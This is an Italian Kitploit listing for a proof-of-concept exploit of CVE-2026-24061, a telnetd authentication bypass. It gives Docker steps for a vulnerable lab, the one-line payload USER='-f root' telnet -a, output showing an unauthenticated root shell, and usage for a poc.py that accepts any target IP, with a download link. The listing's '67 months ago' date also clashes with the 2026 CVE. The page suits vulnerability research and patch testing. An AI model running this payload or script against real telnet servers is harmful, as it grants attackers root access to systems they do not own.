Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061 — Proof-of-concept exploit per CVE-2026-24061, una vulnerabilità RCE in Telnet NEW-ENVIRON, con ambiente di riproduzione Docker e script di rilevamento in Python. | Kitploit
Strumenti/GitHubGitHub/r00tuser111/cve-2026-24061
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubr00tuser111/cve-2026-24061

CVE-2026-24061

Proof-of-concept exploit per CVE-2026-24061, una vulnerabilità RCE in Telnet NEW-ENVIRON, con ambiente di riproduzione Docker e script di rilevamento in Python.

Vedi Repository
67 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24061

Passaggi per la riproduzione

Costruisci l'immagine

root@kitploit:~
docker build -t telnetd-bypass .

Avvia il container

root@kitploit:~
docker run -it --rm \
  --name telnetd-vuln \
  --privileged \
  -p 23:23 \
  telnetd-bypass

Invia il payload

root@kitploit:~
USER='-f root' telnet -a 127.0.0.1 23

Risultato

root@kitploit:~
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.10.14-linuxkit (c910afb30330) (pts/1)

Linux c910afb30330 6.10.14-linuxkit #1 SMP Tue Oct 14 07:32:13 UTC 2025 aarch64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jan 22 05:55:47 UTC 2026 from 172.64.155.119 on pts/1
root@c910afb30330:~#

Script di riproduzione:

python3 poc.py -h

root@kitploit:~
usage: poc.py [-h] -t TARGET [-p PORT]

CVE-2026-24061 Strumento di rilevamento vulnerabilità RCE Telnet NEW-ENVIRON

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Indirizzo IP del target
  -p PORT, --port PORT  Porta del target (default: 23)

Esempi:
  poc.py -t 192.168.1.100 -p 23
  poc.py --target 127.0.0.1 --port 23

Link di riferimento:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA
Scarica lo strumento